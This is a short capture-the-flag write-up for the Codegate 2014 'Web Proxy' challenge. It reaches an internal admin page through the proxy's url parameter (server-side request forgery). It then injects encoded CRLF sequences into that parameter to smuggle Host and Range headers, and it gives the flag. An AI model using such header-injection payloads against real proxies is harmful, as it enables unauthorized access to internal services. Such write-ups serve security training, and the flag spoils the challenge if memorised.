Codegate CTF Preliminary 2014 – Web Proxy Writeup

In this task a web proxy is given:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php

It has a GET parameter “url”:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=google.it

It prints the headers + _part _of the body. We can easly enter the admin page with:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/

but since the body isn’t printed we can’t see all the response. After a bit of testing it pointed out that a CRLF injection was possible so we can split the body with Range: header.

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/%20HTTP/1.0%0D%0AHost:%20localhost%0D%0ARange:%20bytes=372-425%0D%0AConnection:%20close%0D%0A%0D%0A
<!--if($_SERVER[HTTP_HOST]=="hackme")--></body>

Since it wants Host header to be “hackme” lets do it:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N

Razor4x